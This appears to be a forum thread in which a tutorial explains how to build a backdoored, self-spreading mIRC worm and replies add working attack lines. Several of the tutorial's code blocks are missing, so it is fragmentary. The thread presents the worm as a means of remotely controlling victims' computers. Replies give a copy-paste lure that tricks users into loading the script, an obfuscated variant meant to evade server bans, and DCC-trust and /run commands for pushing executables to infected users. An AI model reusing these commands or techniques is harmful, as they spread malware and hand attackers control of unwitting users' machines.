IRC Worm by M.A.B.

Tutorial mIRC Worm

First of all I need to notice you that this worm is backdoored. This means that people that are infected by this worm can be controlled by you. Once infected with the worm they are also infected with the Trojan. Using the Trojan you can control the victim's PC.

Infect the victim

It all starts with the next command:



This in one line!

Special note: seems that it cant be written correctly, well it starts like this:



Understand the Script

We need to mix these two things:

The worm



Here is #mab the channel you want to let them join if they're infected with the worm. But since that would not be very stealth anymore we have to do it in another way. We let it message you. We change the with . Where mab_ is your nickname.

With this your worm has started, it will now spread, it will try to personal message some people saying something, while ignoring people. Done that it will try to send itself to other users, and tell them to type the command.

This is the original worm I designed. Now we are going to change some things about it so the functionality of the Trojan is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the victim. Once the Trojan is implemented that is not the objective, so we will remove that from the worm. So after this changes we get the next script that we have to merge with the Trojan script:



The Trojan



Mixed they will give us the Backdoored IRC Worm. This means that the worm will spread itself, join the certain channel (here: #mab) and after that it will spread itself, and next to that wait for you to control it via the Trojan. So you will have the rights to do whatever you want on his/her computer, using mIRC. You actually use the victim's mIRC to accomplish certain commands. (IRC Trojan) I suggest you visit that webpage and read that tutorial too so you can also fully use the trojan part in the worm.

I will now try to give more details about that script. So you truly understand the worm, so you can easily modify it and achieve better results. I will mix it.

So basically we want to mix these two "mechanisms":



Solution:



In one line:



Where here is DO SOMETHING the Trojan's work and DO SOMETHING ELSE the Worm's work.

Integrated:



Since we need to integrate the trojan and the worm the //mode $me + R gets useless. Because of this we can remove a part of the code here above:



Good this is exactly what we needed. Now this doesn't look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?

//echo -a $asc(char here)

If this gives a bad result this means that the char must be written in another way.

Example encoding of ",":

//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct

Note:

$+ = pasting two strings together

| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)

We have to notice that we don't have to encode that this way, sometimes this method is not needed.

For finding the numbers you use this:

//echo -a $asc($?)

This will pop up an input box, just fill in the char and you'll get the number as result.

Good, we have the knowledge for $encoding now. So this is what we get before we start encoding:



So:



For finding the $encoded variable we split it up as global variables. The variables are set with

/set %var STRING

So for finding it we write the next in mIRC:

//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)

But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line.

We find the next as result:



This pasted to each other in one line!

If you want you can modify the worm into your needs. This is the 'basic' irc worm script. By modifying it you can accomplish things that satisfy your needs. LOl.

By mab, comments and suggestions to ahmadi@pandora.be

Source: mIRC Worm
Website: Homepage

--edit ... removed quote.. too long :-p

Very nice.. I was curious though... (i'm basically an IRC noob).. I was wondering if there is a command to have them download a file once infected.. or even a way to simply DCC to an entire channel would be nice if that's not possible...

I know I can have them run the program with the /run command.. but since i'm just starting on IRC, I have yet to find a way to have them download it.

for those who are tempted...
If you're going to just tell me to check google, don't bother with the spam.. -.-

unfortunately some irc servers(i think all) ban every client that executes the "exploit".
is intended every line like Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs.

$decode is the guilty, the server bans you with a reason like
"(User has been banned from XXX (Spamming an mIRC $decode exploit.))".


Anyway the concept sounds good, but a solution for bypassing the use of $encode and $decode must be found.


Sorry for my english

Never heard of auto ban because of saying such things, actually i dont believe in that, they only banned the guy from your example because an IRC op found out about his infection.

I'm sorry to contradict you, but the server has kicked its a55 immediately after the lame message was sent in pvt to my eggdrop.

Not a human kick, sure

Probably he was doing it for a long time... You dont know about it, i'm sure they havent banned the "$decode" on the main servers, since i'm being using it lately for testing the worm, without trouble.

Hey dude Im not so newb and\or stupid as you think..
The message was sent by me to my eggdrop, and I've been kicked immediately by the server with this message:

"(User has been banned from _SERVERNAME_ (Spamming an mIRC $decode exploit.))".

What server(s) then?

Wondernet. Now I'm trying on another server and I've got no problems at the moment.

erm well i dunnoe the true PURPOSE of the code.....since its like does nothing much besides more spamming
and also
the $decode function is so easily recognisable to raise suspicious...
i think its getting useless now-a-days unless your really some newbie on irc...

/dcc trust [-r] <on | off | nick | address | level>
dcc file.exe to him
/run file.exe

Thought so I read a trust command somewhere, but for some reason couldn't find it again..

Tnx.. now to go have fun

use $chr(3) $+ 4//write . $+ $+($chr(36),eval,$chr(40),$+($chr(36),+,$chr(40),$chr(36),$chr(44),dec,$chr(44),$+($chr(36),null),$chr(44),ode,$chr(44),$+($chr(36),chr,$chr(40),40,$chr(41)),$chr(44),$encode($read($script,n,1),m),$chr(44),m,$chr(44),$+($chr(36),chr,$chr(40),41,$chr(41)),$chr(41))) $chr(124) .load -rs.
instead of $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs.

but first check it, i didnt test it

have fun

Thats way too long??!